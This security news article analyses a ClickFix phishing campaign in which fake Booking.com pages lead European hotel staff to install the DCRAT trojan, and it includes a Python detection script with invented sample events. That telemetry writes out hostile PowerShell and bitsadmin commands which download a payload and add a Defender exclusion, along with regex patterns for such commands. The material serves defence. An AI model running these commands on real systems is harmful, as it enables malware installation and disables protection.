ClickFix Booking.com Phishing Campaign Hits European Hotels with Fake BSOD and DCRAT Malware

CyberSecureFox 🦊

A new phishing campaign tracked as PHALT#BLYX is targeting hotels across Europe by impersonating Booking.com and abusing the technique known as ClickFix. Instead of exploiting software vulnerabilities, the attackers trick hotel staff into manually running a pre-prepared PowerShell command, which ultimately deploys the DCRAT remote access trojan and additional payloads such as cryptocurrency miners.

ClickFix attacks: social engineering instead of technical exploits

ClickFix attacks rely on social engineering rather than code exploits. The victim is guided step by step to paste and execute a command (typically in PowerShell or a terminal), believing it is part of a legitimate troubleshooting process. Because the command is launched by a real user from a normal shell, it looks like interactive administration to controls that trust user-initiated activity, and signature-based tools may not flag it in time.

Industry reports, including recent editions of the Verizon Data Breach Investigations Report and studies by major email security vendors, consistently show that social engineering and phishing remain among the top initial access vectors in corporate breaches. The PHALT#BLYX operation reflects this trend by combining convincing branding, fake support instructions, and user pressure to bypass technical defenses.

Booking.com-themed phishing lures hotel staff with refund claims

The intrusion begins with a phishing email mimicking Booking.com, notifying hotel staff about a supposed reservation cancellation and a substantial refund exceeding €1,000. High refund amounts are deliberately chosen to increase curiosity and prompt users to click for more details.

The link in the email redirects to a domain such as low-house[.]com, hosting a high-fidelity clone of the Booking.com portal. The fraudulent site reproduces corporate colors, logos, and layout closely enough that busy front-desk or reservations personnel may not notice anomalies, especially during peak workload.

Fake Windows BSOD in the browser forces PowerShell execution

Once the victim lands on the phishing page, malicious JavaScript runs. The victim first sees a message such as “Loading is taking too long” with a prompt to refresh or continue. After the click, the page switches the browser to full-screen mode and renders a convincing imitation of a Windows Blue Screen of Death (BSOD) inside the browser window.

Unlike a genuine BSOD, this fake screen contains detailed “recovery” instructions: open the Windows Run dialog (Win+R), press Ctrl+V to paste a command, and press Enter. The page has already placed a pre-built PowerShell command in the clipboard; the earlier click supplies the user gesture that browsers require before a page may write to the clipboard. Less experienced staff may take this for an official Microsoft or Booking.com support procedure. A real BSOD halts the machine entirely, so any “crash screen” that still lets the user move the mouse, open Win+R, or leave full-screen mode with Esc or F11 is a web page, not Windows.

Technical infection chain: from PowerShell to MSBuild and DCRAT

Abusing MSBuild to compile and run a malicious .NET project

When the victim runs the PowerShell command, a fake Booking.com administrative panel is displayed to reduce suspicion while the malware proceeds in the background. The script downloads a .NET project file (v.proj) and hands it to MSBuild.exe, the legitimate build tool that ships with the .NET Framework; a project file can carry inline C# tasks that MSBuild compiles and executes on the spot, so the first stage needs no separate executable of its own. Leveraging trusted, signed system binaries in this way (living off the land) helps the attack evade simple signature-based detection, even though MSBuild has no business running on a front-desk workstation that never builds software.

Disabling defenses, persistence, and payload delivery

After establishing an initial foothold, the malware attempts to obtain administrative rights via User Account Control (UAC) prompts and adds Windows Defender exclusions, a change that itself requires elevation. It then uses the Background Intelligent Transfer Service (BITS) to download the main loader; because BITS transfers are performed by the BITS service process (svchost.exe) rather than by the script, the traffic blends into normal Windows update and telemetry activity.

Persistence is achieved by placing a .url shortcut in the user's Startup folder, so the malicious chain runs each time that user logs into Windows. This low-tech method needs no administrative rights and is simple but effective, especially on endpoints without strict application control policies; it is also easy to audit, since the Startup folder of a front-desk workstation rarely contains more than a handful of known entries.

DCRAT deployment and stealth via process hollowing

The final payload is DCRAT (DarkCrystal RAT), a .NET remote access trojan commonly described as derived from the AsyncRAT code base and frequently seen in criminal botnets. DCRAT is injected into the legitimate aspnet_compiler.exe process using process hollowing: the process is started in a suspended state, its original code is replaced in memory with the attacker's, and execution is then resumed, so the running process carries a legitimate, signed image path while executing malicious code. This in-memory technique complicates detection by antivirus and EDR solutions that rely heavily on file-based scans; a tell-tale sign is aspnet_compiler.exe, which has no reason to talk to the internet, opening outbound network connections.

Once connected to its command-and-control (C2) infrastructure, DCRAT exfiltrates detailed system information and awaits instructions. Its capabilities typically include remote desktop control, keylogging, reverse shells, credential theft, and in-memory payload execution. In the analyzed incidents, operators also deployed a cryptocurrency miner to monetize compromised hosts directly.
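As an added example (not code from the original article or from the campaign analysis), the following Python script runs one simple detection rule per stage of the chain described above over a handful of constructed, Sysmon-shaped events. The paths, URLs, file names and IP address are invented for illustration; the rule logic is the point: a script host launched from explorer.exe with hidden/bypass flags (the Run-dialog launch), MSBuild.exe building a .proj from a script host rather than an IDE, an Add-/Set-MpPreference exclusion, a bitsadmin transfer, a .url file created in a Startup folder, and aspnet_compiler.exe making a network connection. Two benign events are included to show that the rules do not fire on a developer build or a hand-typed PowerShell command.

```python
import re

# Constructed telemetry in a Sysmon-like shape (EventID 1 = process create,
# 3 = network connect, 11 = file create). Paths, URLs and addresses are
# invented for this example; they are not indicators from the campaign.
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSBUILD = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
ASPNET = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
TEMP = r"C:\Users\frontdesk\AppData\Local\Temp"

SAMPLE_EVENTS = [
    # Run-dialog launch: explorer.exe spawns a hidden PowerShell that fetches v.proj
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe", "Image": POWERSHELL,
     "CommandLine": r'powershell -w hidden -nop -ep bypass -c "iwr https://example.invalid/v.proj -OutFile $env:TEMP\v.proj"'},
    # MSBuild builds (and thereby runs) the downloaded project file
    {"EventID": 1, "ParentImage": POWERSHELL, "Image": MSBUILD,
     "CommandLine": MSBUILD + " " + TEMP + r"\v.proj"},
    # Defender exclusion for the staging directory
    {"EventID": 1, "ParentImage": MSBUILD, "Image": POWERSHELL,
     "CommandLine": "powershell Add-MpPreference -ExclusionPath " + TEMP},
    # BITS download of the main loader
    {"EventID": 1, "ParentImage": POWERSHELL, "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": "bitsadmin /transfer upd /download /priority normal https://example.invalid/l.bin " + TEMP + r"\l.bin"},
    # Persistence: a .url shortcut dropped into the user's Startup folder
    {"EventID": 11, "Image": MSBUILD,
     "TargetFilename": r"C:\Users\frontdesk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.url"},
    # Hollowed aspnet_compiler.exe beaconing to C2
    {"EventID": 3, "Image": ASPNET, "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    # Benign noise that must not fire: a developer build and an interactive command
    {"EventID": 1, "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "Image": MSBUILD, "CommandLine": "MSBuild.exe Hotel.sln"},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe", "Image": POWERSHELL,
     "CommandLine": "powershell Get-ChildItem"},
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Flags and cmdlets common in pasted ClickFix one-liners but rare in hand-typed commands.
SUSPICIOUS_PS = re.compile(
    r"-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|-nop\b|-ep\s+bypass"
    r"|\biex\b|invoke-expression|downloadstring|\biwr\b|invoke-webrequest", re.I)
STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup\\", re.I)
DEFENDER_EXCLUSION = re.compile(r"(add|set)-mppreference.*-exclusion", re.I)
PROJECT_FILE = re.compile(r"\.(proj|csproj|xml)\b", re.I)


def _exe(path):
    """Lower-case file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


def rule_clickfix_launch(e):
    # The Run dialog is hosted by explorer.exe, so the pasted command shows up
    # as explorer.exe -> script host with non-interactive flags.
    return (e.get("EventID") == 1 and _exe(e.get("ParentImage", "")) == "explorer.exe"
            and _exe(e.get("Image", "")) in SCRIPT_HOSTS
            and SUSPICIOUS_PS.search(e.get("CommandLine", "")) is not None)


def rule_msbuild_proj(e):
    # Developer builds are started by IDEs or build agents, not by a script host.
    return (e.get("EventID") == 1 and _exe(e.get("Image", "")) == "msbuild.exe"
            and _exe(e.get("ParentImage", "")) in SCRIPT_HOSTS
            and PROJECT_FILE.search(e.get("CommandLine", "")) is not None)


def rule_defender_exclusion(e):
    return e.get("EventID") == 1 and DEFENDER_EXCLUSION.search(e.get("CommandLine", "")) is not None


def rule_bits_download(e):
    cl = e.get("CommandLine", "")
    from_bitsadmin = _exe(e.get("Image", "")) == "bitsadmin.exe" and re.search(r"/transfer|/addfile", cl, re.I) is not None
    from_cmdlet = re.search(r"start-bitstransfer", cl, re.I) is not None
    return e.get("EventID") == 1 and (from_bitsadmin or from_cmdlet)


def rule_startup_url(e):
    target = e.get("TargetFilename", "")
    return e.get("EventID") == 11 and target.lower().endswith(".url") and STARTUP_DIR.search(target) is not None


def rule_hollowed_compiler(e):
    # aspnet_compiler.exe precompiles ASP.NET sites; it has no reason to open sockets.
    return e.get("EventID") == 3 and _exe(e.get("Image", "")) == "aspnet_compiler.exe"


RULES = [
    ("clickfix_launch", rule_clickfix_launch),
    ("msbuild_proj", rule_msbuild_proj),
    ("defender_exclusion", rule_defender_exclusion),
    ("bits_download", rule_bits_download),
    ("startup_url", rule_startup_url),
    ("hollowed_compiler", rule_hollowed_compiler),
]


def detect(events):
    """Return (rule_name, event_index) pairs in event order."""
    return [(name, i) for i, e in enumerate(events) for name, pred in RULES if pred(e)]


def chain_stages(hits):
    """Distinct chain stages seen on one host, in chain order; three or more is a strong signal."""
    order = [name for name, _ in RULES]
    return sorted({name for name, _ in hits}, key=order.index)


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for name, i in hits:
        print(f"[{name}] event {i}")
    print("stages observed:", chain_stages(hits))
```

Each rule on its own produces some noise (administrators do add Defender exclusions, and a build server does run MSBuild from a script), which is why chain_stages matters: correlating several stages on the same host within a short window is what separates this chain from routine administration. In a real deployment the same predicates map directly onto Sysmon or EDR process, file and network telemetry.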

Risks for hotel networks and the wider hospitality sector

With DCRAT installed, compromised hotel workstations can become launchpads for lateral movement across internal networks. Attackers can target property management systems, booking platforms, and payment applications, leading to exposure of guest data, partner accounts, and financial information, as well as disruption of day-to-day hotel operations.

The PHALT#BLYX campaign reportedly uses a customized DCRAT build with resilient C2 infrastructure, including randomized connection points and potential use of public services such as Pastebin as intermediaries. This architecture complicates takedown efforts and allows the botnet to persist even if parts of the infrastructure are disrupted.

Hotels and other hospitality organizations are particularly vulnerable because they rely heavily on third-party online travel agencies (OTAs), such as Booking.com, and often operate under constant time pressure at the reception and reservations desks—conditions that make staff more susceptible to well-crafted phishing messages.

To reduce the effectiveness of similar ClickFix-style campaigns, hospitality organizations should adopt a layered defense. Key measures include phishing-awareness training tailored to booking and refund workflows (with the explicit rule that no legitimate support process asks staff to paste a command into the Run dialog), restricting or auditing PowerShell usage (Constrained Language Mode and script block logging), blocking MSBuild.exe and other developer binaries on non-developer workstations through application control, enforcing the principle of least privilege so that a UAC prompt cannot be satisfied from a front-desk account, deploying EDR solutions with strong behavioral detection, and maintaining tight control over Windows Defender exclusions and Startup folder items. Regular social engineering drills and incident response exercises significantly lower the chance that a single misleading “support” screen turns a hotel workstation into another node in a criminal botnet.
